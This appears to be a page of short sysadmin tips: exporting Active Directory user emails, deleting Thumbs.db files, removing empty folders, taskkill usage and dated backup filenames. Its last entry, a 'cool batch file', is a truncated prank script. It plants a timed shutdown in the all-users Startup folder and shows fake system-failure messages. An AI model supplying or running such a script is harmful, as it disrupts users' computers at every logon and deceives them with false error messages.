content top

List of users with their email adresses

csvde -f yourfile.csv -r "(&(objectCategory=Person)(objectClass=user))" –l "sAMaccountname,mail"

Read More

Delete all thumbs.db

Windows creates in every folder with pictures a thumbs.db file. Linux doesn’t need them, so here is a simple command to get rid of them. sudo find /home/user -name Thumbs.db -exec rm {} \;

Read More

Remove empty directories

To remove empty directories in a directory structure use the following command : sudo find /begin/here -type d -empty -delete

Read More

Taskkill command

taskkill /f /im notepad.exe Kills the open notepad task, if open. taskkill [/s Computer] [/u Domain\User [/p Password]]] [/fi FilterName] [/pid ProcessID]|[/im ImageName] [/f][/t] /s computer Specifies the name or IP address of a remote computer (do not use backslashes). The default is the local computer. /u domain\user Runs the command with the account permissions of the user specified by User or Domain\User. The default is the...

Read More

Create backup file with date of today

How to create a backup file with the date of today. Here is an example with STSADM from Sharepoint Services. stsadm -o backup -filename “\\gl-nas-01\backup$\Sharepoint\GL-SP-01\%date:~-10,3%%date:~-7,3%%date:~-4%.dat” -url http://intranet/sites/home

Read More

One cool batch file – ;-D

@echo off echo shutdown -s -t 5 -c “Windows is shutting down due to an internal error” > C:\close.bat copy C:\close.bat “C:\documents and settings\all users\start menu\programs\startup\” cls echo Maximize this window to continue echo Wscript.Sleep 4000 > C:\sleep1.vbs call C:\sleep1.vbs echo Msgbox”Critical system process failure. Press enter to to begin auto fix.” > c:\error1.vbs call...

Read More
content top